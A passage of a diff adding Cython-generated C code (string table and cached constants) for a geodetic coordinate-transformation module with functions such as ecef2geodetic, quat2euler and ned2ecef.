sizeof(__pyx_k_common_transformations_transform), 0, 0, 1, 0}, + {&__pyx_n_s_common_transformations_transform_2, __pyx_k_common_transformations_transform_2, sizeof(__pyx_k_common_transformations_transform_2), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_double, __pyx_k_double, sizeof(__pyx_k_double), 0, 0, 1, 1}, + {&__pyx_n_s_dtype, __pyx_k_dtype, sizeof(__pyx_k_dtype), 0, 0, 1, 1}, + {&__pyx_n_s_e, __pyx_k_e, sizeof(__pyx_k_e), 0, 0, 1, 1}, + {&__pyx_n_s_ecef, __pyx_k_ecef, sizeof(__pyx_k_ecef), 0, 0, 1, 1}, + {&__pyx_n_s_ecef2geodetic_single, __pyx_k_ecef2geodetic_single, sizeof(__pyx_k_ecef2geodetic_single), 0, 0, 1, 1}, + {&__pyx_n_s_ecef2ned_matrix, __pyx_k_ecef2ned_matrix, sizeof(__pyx_k_ecef2ned_matrix), 0, 0, 1, 1}, + {&__pyx_n_s_ecef2ned_single, __pyx_k_ecef2ned_single, sizeof(__pyx_k_ecef2ned_single), 0, 0, 1, 1}, + {&__pyx_n_s_ecef_euler_from_ned_single, __pyx_k_ecef_euler_from_ned_single, sizeof(__pyx_k_ecef_euler_from_ned_single), 0, 0, 1, 1}, + {&__pyx_n_s_ecef_init, __pyx_k_ecef_init, sizeof(__pyx_k_ecef_init), 0, 0, 1, 1}, + {&__pyx_n_s_ecef_pose, __pyx_k_ecef_pose, sizeof(__pyx_k_ecef_pose), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_euler, __pyx_k_euler, sizeof(__pyx_k_euler), 0, 0, 1, 1}, + {&__pyx_n_s_euler2quat_single, __pyx_k_euler2quat_single, sizeof(__pyx_k_euler2quat_single), 0, 0, 1, 1}, + {&__pyx_n_s_euler2rot_single, __pyx_k_euler2rot_single, sizeof(__pyx_k_euler2rot_single), 0, 0, 1, 1}, + {&__pyx_n_s_from_ecef, __pyx_k_from_ecef, sizeof(__pyx_k_from_ecef), 0, 0, 1, 1}, + {&__pyx_n_s_from_geodetic, __pyx_k_from_geodetic, sizeof(__pyx_k_from_geodetic), 0, 0, 1, 1}, + {&__pyx_n_s_g, __pyx_k_g, sizeof(__pyx_k_g), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_geodetic, __pyx_k_geodetic, sizeof(__pyx_k_geodetic), 0, 0, 1, 1}, + {&__pyx_n_s_geodetic2ecef_single, __pyx_k_geodetic2ecef_single, sizeof(__pyx_k_geodetic2ecef_single), 0, 0, 1, 1}, + {&__pyx_n_s_geodetic2ned_single, __pyx_k_geodetic2ned_single, sizeof(__pyx_k_geodetic2ned_single), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_init, __pyx_k_init, sizeof(__pyx_k_init), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_n, __pyx_k_n, sizeof(__pyx_k_n), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_ned, __pyx_k_ned, sizeof(__pyx_k_ned), 0, 0, 1, 1}, + {&__pyx_n_s_ned2ecef_matrix, __pyx_k_ned2ecef_matrix, sizeof(__pyx_k_ned2ecef_matrix), 0, 0, 1, 1}, + {&__pyx_n_s_ned2ecef_single, __pyx_k_ned2ecef_single, sizeof(__pyx_k_ned2ecef_single), 0, 0, 1, 1}, + {&__pyx_n_s_ned2geodetic_single, __pyx_k_ned2geodetic_single, sizeof(__pyx_k_ned2geodetic_single), 0, 0, 1, 1}, + {&__pyx_n_s_ned_euler_from_ecef_single, __pyx_k_ned_euler_from_ecef_single, sizeof(__pyx_k_ned_euler_from_ecef_single), 0, 0, 1, 1}, + {&__pyx_n_s_ned_pose, __pyx_k_ned_pose, sizeof(__pyx_k_ned_pose), 0, 0, 1, 1}, + {&__pyx_n_s_np, __pyx_k_np, sizeof(__pyx_k_np), 0, 0, 1, 1}, + {&__pyx_n_s_numpy, __pyx_k_numpy, sizeof(__pyx_k_numpy), 0, 0, 1, 1}, + {&__pyx_kp_u_numpy_core_multiarray_failed_to, __pyx_k_numpy_core_multiarray_failed_to, sizeof(__pyx_k_numpy_core_multiarray_failed_to), 0, 1, 0, 0}, + {&__pyx_kp_u_numpy_core_umath_failed_to_impor, __pyx_k_numpy_core_umath_failed_to_impor, sizeof(__pyx_k_numpy_core_umath_failed_to_impor), 0, 1, 0, 0}, + {&__pyx_n_s_pitch, __pyx_k_pitch, sizeof(__pyx_k_pitch), 0, 0, 1, 1}, + {&__pyx_n_s_pose, __pyx_k_pose, sizeof(__pyx_k_pose), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_q, __pyx_k_q, sizeof(__pyx_k_q), 0, 0, 1, 1}, + {&__pyx_n_s_quat, __pyx_k_quat, sizeof(__pyx_k_quat), 0, 0, 1, 1}, + {&__pyx_n_s_quat2euler_single, __pyx_k_quat2euler_single, sizeof(__pyx_k_quat2euler_single), 0, 0, 1, 1}, + {&__pyx_n_s_quat2rot_single, __pyx_k_quat2rot_single, sizeof(__pyx_k_quat2rot_single), 0, 0, 1, 1}, + {&__pyx_n_s_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_roll, __pyx_k_roll, sizeof(__pyx_k_roll), 0, 0, 1, 1}, + {&__pyx_n_s_rot, __pyx_k_rot, sizeof(__pyx_k_rot), 0, 0, 1, 1}, + {&__pyx_n_s_rot2euler_single, __pyx_k_rot2euler_single, sizeof(__pyx_k_rot2euler_single), 0, 0, 1, 1}, + {&__pyx_n_s_rot2quat_single, __pyx_k_rot2quat_single, sizeof(__pyx_k_rot2quat_single), 0, 0, 1, 1}, + {&__pyx_n_s_rot_matrix, __pyx_k_rot_matrix, sizeof(__pyx_k_rot_matrix), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_kp_s_self_lc_cannot_be_converted_to_a, __pyx_k_self_lc_cannot_be_converted_to_a, sizeof(__pyx_k_self_lc_cannot_be_converted_to_a), 0, 0, 1, 0}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_yaw, __pyx_k_yaw, sizeof(__pyx_k_yaw), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_AssertionError = __Pyx_GetBuiltinName(__pyx_n_s_AssertionError); if (!__pyx_builtin_AssertionError) __PYX_ERR(0, 32, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(2, 986, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_tuple_ = PyTuple_Pack(1, __pyx_kp_u_numpy_core_multiarray_failed_to); if (unlikely(!__pyx_tuple_)) __PYX_ERR(2, 986, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple_); + __Pyx_GIVEREF(__pyx_tuple_); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_tuple__2 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_umath_failed_to_impor); if (unlikely(!__pyx_tuple__2)) __PYX_ERR(2, 992, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__2); + __Pyx_GIVEREF(__pyx_tuple__2); + + /* "common/transformations/transformations.pyx":57 + * return g + * + * def euler2quat_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) + */ + __pyx_tuple__4 = PyTuple_Pack(3, __pyx_n_s_euler, __pyx_n_s_e, __pyx_n_s_q); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__4); + __Pyx_GIVEREF(__pyx_tuple__4); + __pyx_codeobj__5 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__4, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_euler2quat_single, 57, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__5)) __PYX_ERR(0, 57, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":62 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def quat2euler_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); + */ + __pyx_tuple__6 = PyTuple_Pack(3, __pyx_n_s_quat, __pyx_n_s_q, __pyx_n_s_e); if (unlikely(!__pyx_tuple__6)) __PYX_ERR(0, 62, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__6); + __Pyx_GIVEREF(__pyx_tuple__6); + __pyx_codeobj__7 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__6, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_quat2euler_single, 62, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__7)) __PYX_ERR(0, 62, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":67 + * return [e(0), e(1), e(2)] + * + * def quat2rot_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) + */ + __pyx_tuple__8 = PyTuple_Pack(3, __pyx_n_s_quat, __pyx_n_s_q, __pyx_n_s_r); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(0, 67, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__8); + __Pyx_GIVEREF(__pyx_tuple__8); + __pyx_codeobj__9 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__8, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_quat2rot_single, 67, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__9)) __PYX_ERR(0, 67, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":72 + * return matrix2numpy(r) + * + * def rot2quat_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) + */ + __pyx_tuple__10 = PyTuple_Pack(3, __pyx_n_s_rot, __pyx_n_s_r, __pyx_n_s_q); if (unlikely(!__pyx_tuple__10)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__10); + __Pyx_GIVEREF(__pyx_tuple__10); + __pyx_codeobj__11 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__10, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_rot2quat_single, 72, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__11)) __PYX_ERR(0, 72, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":77 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def euler2rot_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) + */ + __pyx_tuple__12 = PyTuple_Pack(3, __pyx_n_s_euler, __pyx_n_s_e, __pyx_n_s_r); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(0, 77, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__12); + __Pyx_GIVEREF(__pyx_tuple__12); + __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_euler2rot_single, 77, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(0, 77, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":82 + * return matrix2numpy(r) + * + * def rot2euler_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) + */ + __pyx_tuple__14 = PyTuple_Pack(3, __pyx_n_s_rot, __pyx_n_s_r, __pyx_n_s_e); if (unlikely(!__pyx_tuple__14)) __PYX_ERR(0, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__14); + __Pyx_GIVEREF(__pyx_tuple__14); + __pyx_codeobj__15 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__14, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_rot2euler_single, 82, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__15)) __PYX_ERR(0, 82, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":87 + * return [e(0), e(1), e(2)] + * + * def rot_matrix(roll, pitch, yaw): # <<<<<<<<<<<<<< + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + */ + __pyx_tuple__16 = PyTuple_Pack(3, __pyx_n_s_roll, __pyx_n_s_pitch, __pyx_n_s_yaw); if (unlikely(!__pyx_tuple__16)) __PYX_ERR(0, 87, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__16); + __Pyx_GIVEREF(__pyx_tuple__16); + __pyx_codeobj__17 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__16, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_rot_matrix, 87, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__17)) __PYX_ERR(0, 87, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":90 + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + */ + __pyx_tuple__18 = PyTuple_Pack(5, __pyx_n_s_ecef_init, __pyx_n_s_ned_pose, __pyx_n_s_init, __pyx_n_s_pose, __pyx_n_s_e); if (unlikely(!__pyx_tuple__18)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__18); + __Pyx_GIVEREF(__pyx_tuple__18); + __pyx_codeobj__19 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__18, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ecef_euler_from_ned_single, 90, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__19)) __PYX_ERR(0, 90, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":97 + * return [e(0), e(1), e(2)] + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + */ + __pyx_tuple__20 = PyTuple_Pack(5, __pyx_n_s_ecef_init, __pyx_n_s_ecef_pose, __pyx_n_s_init, __pyx_n_s_pose, __pyx_n_s_e); if (unlikely(!__pyx_tuple__20)) __PYX_ERR(0, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__20); + __Pyx_GIVEREF(__pyx_tuple__20); + __pyx_codeobj__21 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ned_euler_from_ecef_single, 97, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__21)) __PYX_ERR(0, 97, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":104 + * return [e(0), e(1), e(2)] + * + * def geodetic2ecef_single(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) + */ + __pyx_tuple__22 = PyTuple_Pack(3, __pyx_n_s_geodetic, __pyx_n_s_g, __pyx_n_s_e); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + __pyx_codeobj__23 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__22, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_geodetic2ecef_single, 104, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__23)) __PYX_ERR(0, 104, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":109 + * return [e.x, e.y, e.z] + * + * def ecef2geodetic_single(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) + */ + __pyx_tuple__24 = PyTuple_Pack(3, __pyx_n_s_ecef, __pyx_n_s_e, __pyx_n_s_g); if (unlikely(!__pyx_tuple__24)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__24); + __Pyx_GIVEREF(__pyx_tuple__24); + __pyx_codeobj__25 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__24, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ecef2geodetic_single, 109, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__25)) __PYX_ERR(0, 109, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":141 + * return self.ned2ecef_matrix + * + * @classmethod # <<<<<<<<<<<<<< + * def from_geodetic(cls, geodetic): + * return cls(geodetic=geodetic) + */ + __pyx_tuple__26 = PyTuple_Pack(2, __pyx_n_s_cls, __pyx_n_s_geodetic); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 141, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__26); + __Pyx_GIVEREF(__pyx_tuple__26); + __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__26, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_from_geodetic, 141, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(0, 141, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":145 + * return cls(geodetic=geodetic) + * + * @classmethod # <<<<<<<<<<<<<< + * def from_ecef(cls, ecef): + * return cls(ecef=ecef) + */ + __pyx_tuple__28 = PyTuple_Pack(2, __pyx_n_s_cls, __pyx_n_s_ecef); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__28); + __Pyx_GIVEREF(__pyx_tuple__28); + __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__28, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_from_ecef, 145, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 145, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":149 + * return cls(ecef=ecef) + * + * def ecef2ned_single(self, ecef): # <<<<<<<<<<<<<< + * assert self.lc + * cdef ECEF e = list2ecef(ecef) + */ + __pyx_tuple__30 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_ecef, __pyx_n_s_e, __pyx_n_s_n); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__30); + __Pyx_GIVEREF(__pyx_tuple__30); + __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__30, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ecef2ned_single, 149, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(0, 149, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":155 + * return [n.n, n.e, n.d] + * + * def ned2ecef_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + __pyx_tuple__32 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_ned, __pyx_n_s_n, __pyx_n_s_e); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__32); + __Pyx_GIVEREF(__pyx_tuple__32); + __pyx_codeobj__33 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ned2ecef_single, 155, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__33)) __PYX_ERR(0, 155, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":161 + * return [e.x, e.y, e.z] + * + * def geodetic2ned_single(self, geodetic): # <<<<<<<<<<<<<< + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) + */ + __pyx_tuple__34 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_geodetic, __pyx_n_s_g, __pyx_n_s_n); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(0, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__34, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_geodetic2ned_single, 161, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(0, 161, __pyx_L1_error) + + /* "common/transformations/transformations.pyx":167 + * return [n.n, n.e, n.d] + * + * def ned2geodetic_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + __pyx_tuple__36 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_ned, __pyx_n_s_n, __pyx_n_s_g); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(0, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__36); + __Pyx_GIVEREF(__pyx_tuple__36); + __pyx_codeobj__37 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__36, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_transformations_transform, __pyx_n_s_ned2geodetic_single, 167, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__37)) __PYX_ERR(0, 167, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_tuple__38 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + __pyx_codeobj__39 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__38, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__39)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.lc cannot be converted to a Python object for pickling" + */ + __pyx_tuple__40 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__40); + __Pyx_GIVEREF(__pyx_tuple__40); + __pyx_codeobj__41 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__40, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, 